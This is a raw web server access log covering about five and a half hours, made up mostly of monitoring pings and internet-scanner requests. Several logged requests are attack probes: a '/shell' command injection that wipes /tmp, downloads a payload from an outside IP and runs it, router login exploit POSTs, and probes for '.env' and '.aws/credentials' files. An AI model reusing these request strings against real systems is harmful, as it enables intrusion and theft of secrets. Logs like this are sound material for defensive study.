212.91.246.72 - - [05/Sep/2023:23:23:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:24:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:25:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:26:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.44.254.237 - - [05/Sep/2023:23:27:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [05/Sep/2023:23:27:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:28:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.233.19.175 - - [05/Sep/2023:23:29:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2023:23:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.233.19.207 - - [05/Sep/2023:23:29:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2023:23:30:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:31:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.234.40.122 - - [05/Sep/2023:23:32:34 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.156.6.221/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [05/Sep/2023:23:32:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:33:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.233.19.171 - - [05/Sep/2023:23:34:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2023:23:34:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:35:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:36:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:37:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
151.242.250.89 - - [05/Sep/2023:23:38:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [05/Sep/2023:23:38:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:39:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.38 - - [05/Sep/2023:23:40:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.38 - - [05/Sep/2023:23:40:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.38 - - [05/Sep/2023:23:40:06 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.38 - - [05/Sep/2023:23:40:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [05/Sep/2023:23:40:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:41:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:42:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:43:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:44:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:45:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.142 - - [05/Sep/2023:23:45:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [05/Sep/2023:23:46:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:47:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:48:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:49:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.142 - - [05/Sep/2023:23:49:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [05/Sep/2023:23:50:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:51:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:52:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:53:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:54:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
23.151.232.70 - - [05/Sep/2023:23:55:44 +0200] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/Sep/2023:23:55:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:56:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:57:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.76.51.163 - - [05/Sep/2023:23:58:47 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [05/Sep/2023:23:58:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2023:23:59:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.142 - - [06/Sep/2023:00:11:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
193.141.60.71 - - [06/Sep/2023:00:16:13 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.141.60.71 - - [06/Sep/2023:00:16:15 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.224.128.142 - - [06/Sep/2023:00:18:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.224.128.142 - - [06/Sep/2023:00:22:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
80.76.51.163 - - [06/Sep/2023:00:39:55 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.43.33.218 - - [06/Sep/2023:00:40:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
167.94.138.125 - - [06/Sep/2023:00:45:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.125 - - [06/Sep/2023:00:45:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.125 - - [06/Sep/2023:00:45:21 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.125 - - [06/Sep/2023:00:45:22 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.233.19.152 - - [06/Sep/2023:00:47:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.233.19.174 - - [06/Sep/2023:00:48:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.85 - - [06/Sep/2023:00:49:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
41.216.181.162 - - [06/Sep/2023:00:51:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.1; en-US)"
162.216.150.234 - - [06/Sep/2023:00:55:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.237 - - [06/Sep/2023:01:08:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
118.193.32.87 - - [06/Sep/2023:01:13:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
159.203.128.122 - - [06/Sep/2023:01:16:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
181.41.206.226 - - [06/Sep/2023:01:20:46 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS)"
197.38.113.28 - - [06/Sep/2023:01:24:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.224.128.142 - - [06/Sep/2023:01:26:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.224.128.142 - - [06/Sep/2023:01:28:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.224.128.142 - - [06/Sep/2023:01:33:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
159.203.128.122 - - [06/Sep/2023:01:36:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
159.203.128.122 - - [06/Sep/2023:01:36:24 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.89/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
43.129.39.176 - - [06/Sep/2023:01:38:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
181.41.206.226 - - [06/Sep/2023:01:39:13 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS)"
185.233.19.158 - - [06/Sep/2023:01:39:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.186 - - [06/Sep/2023:01:45:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.186 - - [06/Sep/2023:01:45:02 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.186 - - [06/Sep/2023:01:45:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.49 - - [06/Sep/2023:02:14:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.49 - - [06/Sep/2023:02:14:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.49 - - [06/Sep/2023:02:14:20 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.49 - - [06/Sep/2023:02:14:21 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.180.143.137 - - [06/Sep/2023:02:14:31 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
154.209.125.128 - - [06/Sep/2023:02:14:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
103.178.228.36 - - [06/Sep/2023:02:17:49 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
151.242.86.92 - - [06/Sep/2023:02:25:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.180.143.137 - - [06/Sep/2023:02:36:29 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.141.60.71 - - [06/Sep/2023:03:04:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
51.77.78.54 - - [06/Sep/2023:03:09:56 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
51.77.78.54 - - [06/Sep/2023:03:09:56 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
167.94.146.52 - - [06/Sep/2023:03:12:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.52 - - [06/Sep/2023:03:12:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.52 - - [06/Sep/2023:03:12:04 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.52 - - [06/Sep/2023:03:12:04 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.180.143.190 - - [06/Sep/2023:03:33:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.34.212.110 - - [06/Sep/2023:03:35:51 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
159.223.12.224 - - [06/Sep/2023:03:45:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
193.34.212.110 - - [06/Sep/2023:03:49:17 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
104.234.204.134 - - [06/Sep/2023:03:49:31 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5"
167.94.138.126 - - [06/Sep/2023:03:52:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.126 - - [06/Sep/2023:03:52:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.126 - - [06/Sep/2023:03:52:21 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.126 - - [06/Sep/2023:03:52:21 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
193.34.212.110 - - [06/Sep/2023:04:00:10 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
104.234.204.134 - - [06/Sep/2023:04:02:57 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
205.210.31.110 - - [06/Sep/2023:04:03:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
65.49.1.25 - - [06/Sep/2023:04:07:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.38.31.177 - - [06/Sep/2023:04:08:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
193.34.212.110 - - [06/Sep/2023:04:11:57 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.165.190.34 - - [06/Sep/2023:04:12:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.165.190.34 - - [06/Sep/2023:04:12:26 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.165.190.34 - - [06/Sep/2023:04:12:26 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.165.190.34 - - [06/Sep/2023:04:12:26 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.165.190.34 - - [06/Sep/2023:04:12:27 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
35.203.210.19 - - [06/Sep/2023:04:12:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
193.141.60.71 - - [06/Sep/2023:04:14:09 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.180.143.72 - - [06/Sep/2023:04:17:20 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
159.203.95.19 - - [06/Sep/2023:04:17:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
51.159.164.227 - - [06/Sep/2023:04:22:24 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.164.227 - - [06/Sep/2023:04:22:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
205.210.31.181 - - [06/Sep/2023:04:24:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
65.49.20.66 - - [06/Sep/2023:04:27:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
64.62.197.203 - - [06/Sep/2023:04:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
64.62.197.7 - - [06/Sep/2023:04:27:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
64.62.197.112 - - [06/Sep/2023:04:27:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
65.49.20.66 - - [06/Sep/2023:04:29:14 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0"
64.62.197.16 - - [06/Sep/2023:04:29:19 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0"
64.62.197.119 - - [06/Sep/2023:04:29:24 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0"
64.62.197.205 - - [06/Sep/2023:04:29:38 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
65.49.20.66 - - [06/Sep/2023:04:29:51 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
64.62.197.13 - - [06/Sep/2023:04:29:59 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
64.62.197.114 - - [06/Sep/2023:04:30:03 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
64.62.197.204 - - [06/Sep/2023:04:30:17 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
159.203.95.19 - - [06/Sep/2023:04:36:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
159.203.95.19 - - [06/Sep/2023:04:36:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.81/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
104.234.204.134 - - [06/Sep/2023:04:36:29 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36"
45.79.172.21 - - [06/Sep/2023:04:40:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.94 - - [06/Sep/2023:04:47:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.172.21 - - [06/Sep/2023:04:49:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.33.80.243 - - [06/Sep/2023:04:50:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.94 - - [06/Sep/2023:04:52:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
109.205.213.94 - - [06/Sep/2023:04:52:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.203.210.132 - - [06/Sep/2023:04:53:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.175.213.4 - - [06/Sep/2023:04:54:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
